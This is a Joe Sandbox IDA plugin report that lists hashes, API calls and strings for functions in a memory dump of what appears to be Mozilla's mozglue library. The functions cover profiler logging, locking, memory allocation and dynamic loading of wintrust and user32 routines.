Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 4a9e6b714ddbe5bafdd6b7099d6fdf43221999b6a69a6068302379a90aada78d
Instruction ID: 9eb06feb8aa8a12f2ccd3e17d3c82c3ef5474ddb16a8321e42f64e0f3cd03906
Opcode Fuzzy Hash: 4a9e6b714ddbe5bafdd6b7099d6fdf43221999b6a69a6068302379a90aada78d
Instruction Fuzzy Hash: 2E51AEB4A003198FCF10DF68C880A9AB7F1FF89324F54855AD919A7340D736F986CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F

GetCurrentThreadId.KERNEL32 ref: 6BA9E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6BA9E084,00000000), ref: 6BA9E137

Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6BA9E196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6BA9E1E9

Part of subcall function 6BA999A0: GetCurrentThreadId.KERNEL32 ref: 6BA999C1
Part of subcall function 6BA999A0: AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA999CE
Part of subcall function 6BA999A0: ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA999F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6BA9E13F

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: f4072c65e3cf87e81e142753ff32076bb55cd43a068183f77866844df7d7a55d
Instruction ID: 479cdcd79eb8a211897cc1fd6b3fce3e4820c47d0cffe89200d6640ca517d361
Opcode Fuzzy Hash: f4072c65e3cf87e81e142753ff32076bb55cd43a068183f77866844df7d7a55d
Instruction Fuzzy Hash: 2D3126B16543009FCF00AF2C954136BF7E5EFC9648F14852EE8994B242EB78C989DB93

Uniqueness

Uniqueness Score: -1.00%

Function 6BA90210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6BA90222
moz_xmalloc.MOZGLUE(0000000C), ref: 6BA90231

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BA9028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6BA902F7

Strings

@, xrefs: 6BA902D8

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 5422f38f3dc6a0f435aab5ed19bda8239c80b92ba76acb434b1ed34ece9de153
Instruction ID: 9db89ee566d4511e7632585b956b1b7628def568399e756e860f90b67a559721
Opcode Fuzzy Hash: 5422f38f3dc6a0f435aab5ed19bda8239c80b92ba76acb434b1ed34ece9de153
Instruction Fuzzy Hash: AE31BFB2A002108FEF64DF68D98071AB7E6EF44794B18856DDA5ADB340E735EC81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F

GetCurrentThreadId.KERNEL32 ref: 6BA9E047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9E04F

Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9E09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9E0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6BA9E057

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: 24809208355e5a79662b5a295d02c6aef5b5c3d1d903207f99807e78174e37ab
Instruction ID: f4e617fa5d22cd374b78e87d55d71810928f4e0c0b109e2c1d11d53283c573d5
Opcode Fuzzy Hash: 24809208355e5a79662b5a295d02c6aef5b5c3d1d903207f99807e78174e37ab
Instruction Fuzzy Hash: 7C21F874A10204AFDF00EF74E5596AEB7F5FF85208F444514E80697341DB39E98AC791

Uniqueness

Uniqueness Score: -1.00%

Function 6BABAB90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,6BA7BFBD,.dll,00000000,00000000,00000000,6BA7BFBD), ref: 6BABABBD
moz_xmalloc.MOZGLUE(00000001), ref: 6BABABD8

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6BABABEB
SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6BABAC03

Strings

.dll, xrefs: 6BABABB4, 6BABABFA

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: PathSearch$mallocmemsetmoz_xmalloc
String ID: .dll
API String ID: 3063185715-2738580789
Opcode ID: e0cd6f041170442bed5e6caf95cdb7d40c9185ed8386f005fc67c3359dcf61c8
Instruction ID: ffeaadf140fac6e276ea8427a71b836eee5a167b84a81317a5edeee7fc504fc0
Opcode Fuzzy Hash: e0cd6f041170442bed5e6caf95cdb7d40c9185ed8386f005fc67c3359dcf61c8
Instruction Fuzzy Hash: 280196B2A042156FEF005F74CC45ABFB6AEEB85250F054035FD04D3210EB799D9547B1

Uniqueness

Uniqueness Score: -1.00%

Function 6BABA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BADF770,-00000001,?,6BACE330,?,6BA7BDF7), ref: 6BABA7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6BA7BDF7), ref: 6BABA7C2
moz_xmalloc.MOZGLUE(00000018,?,6BA7BDF7), ref: 6BABA7E4
LeaveCriticalSection.KERNEL32(6BADF770), ref: 6BABA80A

Strings

accelerator.dll, xrefs: 6BABA7BF

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 2cc725753c4a3f936be30c265ddb3a43fd13c7ee38304ae7953db1165ab09b3a
Instruction ID: f21b9c383947f115dd5576139bd766156d0ce24140b835ee7ae9806b10bbd3f1
Opcode Fuzzy Hash: 2cc725753c4a3f936be30c265ddb3a43fd13c7ee38304ae7953db1165ab09b3a
Instruction Fuzzy Hash: 20018FB16083049FDF04CF19D885C5677B9FB8931170880AEE819CB341DB71D880CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA5F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6BA5EE51,?), ref: 6BA5F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6BA5F0C2

Strings

ole32, xrefs: 6BA5F0AD
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6BA5F0DC
Could not find CoTaskMemFree, xrefs: 6BA5F0E3

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 222be4d2d48e4bbde11f9239cbcec1006fb23495e9fd43273b28bcfa1c694572
Instruction ID: 55ba9f2545b12f80589aca87bd57fa8ccf5514c520c1c00ddb7b03e091c54594
Opcode Fuzzy Hash: 222be4d2d48e4bbde11f9239cbcec1006fb23495e9fd43273b28bcfa1c694572
Instruction Fuzzy Hash: DCE04871649301BFEF145A75981963737A97B52605308C13DE612D1640FE3BD591C631

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB73E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32.dll,?,?,6BA6434E), ref: 6BAB73EB
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6BAB7404
FreeLibrary.KERNEL32(?,?,6BA6434E), ref: 6BAB7413

Strings

SetProcessDpiAwarenessContext, xrefs: 6BAB73FE
user32.dll, xrefs: 6BAB73E6

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SetProcessDpiAwarenessContext$user32.dll
API String ID: 145871493-397433131
Opcode ID: c54a64cd359aa93b1e4e41dac69f4d1b6eecbc7bff882635551c3f50e940af20
Instruction ID: 641fef66e488386b0b0c32b0ed30eb37eec0ebb6ebb893fa74279ffd0b8b6da0
Opcode Fuzzy Hash: c54a64cd359aa93b1e4e41dac69f4d1b6eecbc7bff882635551c3f50e940af20
Instruction Fuzzy Hash: ACE012702053019FEB102FA4C808B42BEECAB06642F00C92EEA95C3710EFB9D8419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BA901C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67266), ref: 6BA901C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6BA901E7
FreeLibrary.KERNEL32(?,6BA67266), ref: 6BA901FE

Strings

CryptCATAdminReleaseContext, xrefs: 6BA901E1
wintrust.dll, xrefs: 6BA901C3

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 6a3e23c7d2e67c081cfc86dd24874ec276d989d2868c11e09a5b61a251915658
Instruction ID: effaedc477e903fe9a842f5a2b9aa2ebd734726c86f33867f38d2c7960795f66
Opcode Fuzzy Hash: 6a3e23c7d2e67c081cfc86dd24874ec276d989d2868c11e09a5b61a251915658
Instruction Fuzzy Hash: ADE09A745893859FEF106F65980870B7BF8BB87B81F54C56EEA14C2240DF7AC042EB12

Uniqueness

Uniqueness Score: -1.00%

Function 6BA90120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67297), ref: 6BA90128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6BA90147
FreeLibrary.KERNEL32(?,6BA67297), ref: 6BA9015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6BA90141
wintrust.dll, xrefs: 6BA90123

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: b128b9a768022c11960f13ff02a7db9e9d6079e7c4e949ba8a77dd60a42b19f1
Instruction ID: c24ff2bf75df34022e132d54d5d3f69068a39c9365deb1598ea7b87bc8bdce32
Opcode Fuzzy Hash: b128b9a768022c11960f13ff02a7db9e9d6079e7c4e949ba8a77dd60a42b19f1
Instruction Fuzzy Hash: 90E0E5781083449FEF106B29980C70A3BE8A783741F54C12FA904C3340DB7AC0429B12

Uniqueness

Uniqueness Score: -1.00%

Function 6BA90170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67308), ref: 6BA90178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6BA90197
FreeLibrary.KERNEL32(?,6BA67308), ref: 6BA901AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6BA90191
wintrust.dll, xrefs: 6BA90173

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 295066d765b10c5cd32b89b943e29ac959c6049cd217d22242977672977e4120
Instruction ID: b5bd8502b64a464b7d3158be4c8b5a42fe45063e34753d4637c7702300d86965
Opcode Fuzzy Hash: 295066d765b10c5cd32b89b943e29ac959c6049cd217d22242977672977e4120
Instruction Fuzzy Hash: 02E09A755883059FEF506F65D908B0A7BF8B786781F54C16FE98482380DF7AC082DA22

Uniqueness

Uniqueness Score: -1.00%

Function 6BA90080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67204), ref: 6BA90088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6BA900A7
FreeLibrary.KERNEL32(?,6BA67204), ref: 6BA900BE

Strings

CryptCATAdminAcquireContext2, xrefs: 6BA900A1
wintrust.dll, xrefs: 6BA90083

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 7d04cb19d08fc1993756838d4c48068691f30d9605ed669db4a5130275e21d40
Instruction ID: 3163acb4f0ba3f892da5f3fa8a79ad21734805ebddb48a49342095bf9e02afc7
Opcode Fuzzy Hash: 7d04cb19d08fc1993756838d4c48068691f30d9605ed669db4a5130275e21d40
Instruction Fuzzy Hash: A4E09A74548305ABEF106F65A81875A7BE8BB8B781F44C12DE954C2254DF7AC082EB12

Uniqueness

Uniqueness Score: -1.00%

Function 6BA900D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BA67235), ref: 6BA900D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6BA900F7
FreeLibrary.KERNEL32(?,6BA67235), ref: 6BA9010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6BA900F1
wintrust.dll, xrefs: 6BA900D3

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: ba436a0ac0272682f1d43cc16a7cf8fe6ba76a41a9ff3eb9b83bcec3f1950d05
Instruction ID: 5164e09b797fc7959c12a99d327b1207000feb0277c3d9fb9b5bf0f860da263f
Opcode Fuzzy Hash: ba436a0ac0272682f1d43cc16a7cf8fe6ba76a41a9ff3eb9b83bcec3f1950d05
Instruction Fuzzy Hash: E2E04F7428C3059BEF006F25D90972A3BF8A783641F54C03EA94882240DF7AC082DB12

Uniqueness

Uniqueness Score: -1.00%

Function 6BABBAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6BA605BC), ref: 6BABBAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6BABBAD7
FreeLibrary.KERNEL32(?,6BA605BC), ref: 6BABBAEC

Strings

kernelbase.dll, xrefs: 6BABBAB3
VirtualAlloc2, xrefs: 6BABBAD1

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: 7830ff7dbc2a53d5a6325e7ffc75e9853b285919dceb07097b795cbe1e03c5aa
Instruction ID: 082ee8f8272deb20a7f7f2631342d8704b50cd6c02c0062a03286a66badc6128
Opcode Fuzzy Hash: 7830ff7dbc2a53d5a6325e7ffc75e9853b285919dceb07097b795cbe1e03c5aa
Instruction Fuzzy Hash: 1FE0BF705093419BDF005F62C95874A7BF8E786205F94C12DE914C2340EFBAC1468B11

Uniqueness

Uniqueness Score: -1.00%

Function 6BABC290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BA677C5), ref: 6BABC298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6BABC2B7
FreeLibrary.KERNEL32(?,6BA677C5), ref: 6BABC2CC

Strings

CryptCATAdminCalcHashFromFileHandle, xrefs: 6BABC2B1
wintrust.dll, xrefs: 6BABC293

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 3937b972bd7e1bcdb8bb4cdef17e8c15710a06abfeb1811feac64fef4ee6535e
Instruction ID: 342e23b604fd3783f3b4c22eb354a7130b9896103b0803fcfbbb5e074b992f9f
Opcode Fuzzy Hash: 3937b972bd7e1bcdb8bb4cdef17e8c15710a06abfeb1811feac64fef4ee6535e
Instruction Fuzzy Hash: 6AE09A745493019FDF006B69890870B7BE8FB86205F88812EA95482350EB76C152CA51

Uniqueness

Uniqueness Score: -1.00%

Function 6BABC240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BA677F6), ref: 6BABC248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6BABC267
FreeLibrary.KERNEL32(?,6BA677F6), ref: 6BABC27C

Strings

CryptCATAdminAcquireContext, xrefs: 6BABC261
wintrust.dll, xrefs: 6BABC243

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 4de253fbf4bc628f6f45ae38df198f330def6d293bd30049254a3d7da0f4555f
Instruction ID: 8e1c374634f69a99fcda648d9a23f3266de5876e155c1ef1a7f9e29dbf36c7c6
Opcode Fuzzy Hash: 4de253fbf4bc628f6f45ae38df198f330def6d293bd30049254a3d7da0f4555f
Instruction Fuzzy Hash: 34E09A745083019BDF046F659808B4A7EE8AB8B305F50C16DE954C3340EB76C0829B52

Uniqueness

